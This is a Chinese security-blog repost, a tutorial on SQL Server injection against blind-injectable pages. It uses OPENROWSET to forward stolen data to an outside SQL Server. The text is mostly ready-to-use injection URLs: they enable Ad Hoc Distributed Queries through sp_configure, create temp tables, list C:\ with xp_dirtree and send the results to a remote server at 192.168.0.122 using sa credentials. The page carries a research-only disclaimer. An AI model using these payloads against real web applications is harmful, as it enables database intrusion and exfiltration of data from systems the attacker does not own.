SQL注入基础 sqlserver openrowset转发利用

admin 2022年5月24日09:25:08安全文章评论11 views1406字阅读4分41秒阅读模式
点击上方“蓝字”关注我们
sqlserver openrowset转发利用
1
简介

适用于盲注入,页面不返回信息 使用这种注入方法,需要一台带有sqlserver的机器。

原理就是把当前数据转发到远程的sqlserver上。

启用Ad Hoc Distributed Queries:

;exec sp_configure 'show advanced options',1 reconfigure

;exec sp_configure 'Ad Hoc Distributed Queries',1 reconfigure

为了安全使用完成后,关闭Ad Hoc Distributed Queries:

;exec sp_configure 'Ad Hoc Distributed Queries',0 reconfigure

;exec sp_configure 'show advanced options',0 reconfigure


2
开启扩展

http://www.demo1.com/index.aspx?id=1;exec sp_configure ‘show advanced options’,1 reconfigure;exec sp_configure ‘Ad Hoc Distributed Queries’,1 reconfigure


本地建立临时表

create table ##version (VERSION varchar(500))



3
查询系统信息


http://www.demo1.com/index.aspx?id=1;insert into OPENROWSET('SQLOLEDB', 'server=192.168.0.122;uid=sa;pwd=123456', 'select * from %23%23version' ) select DB_NAME()

SQL注入基础 sqlserver openrowset转发利用

执行上面语句之后 再来查询远程sqlserver上的表

select * from ##version

SQL注入基础 sqlserver openrowset转发利用


4
两边创建临时表


create table ##nonamed( dir ntext, num int )

http://www.demo1.com/index.aspx?id=1;create table %23%23nonamed( dir ntext, num int )


5
查询路径


insert %23%23nonamed execute master..xp_dirtree 'c:/',1

向nonamed表插入c盘下路径的数据

http://www.demo1.com/index.aspx?id=1;insert %23%23nonamed execute master..xp_dirtree 'c:/',1

这里就是把数据转发到远程192.168.0.122 sqlserver上

http://www.demo1.com/index.aspx?id=1;insert into OPENROWSET('SQLOLEDB', 'server=192.168.0.122;uid=sa;pwd=123456', 'select * from %23%23nonamed' ) select * from %23%23nonamed

在远程sqlserver执行这个命令 就可以获取 数据

select * from %23%23nonamed

SQL注入基础 sqlserver openrowset转发利用


6
关注公众号


温馨提示



如果你喜欢本文,请分享到朋友圈,想要获得更多信息,请关注我。

7
健身少女


SQL注入基础 sqlserver openrowset转发利用

SQL注入基础 sqlserver openrowset转发利用

SQL注入基础 sqlserver openrowset转发利用




原文始发于微信公众号(moonsec):SQL注入基础 sqlserver openrowset转发利用

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月24日09:25:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  SQL注入基础 sqlserver openrowset转发利用 http://cn-sec.com/archives/565524.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: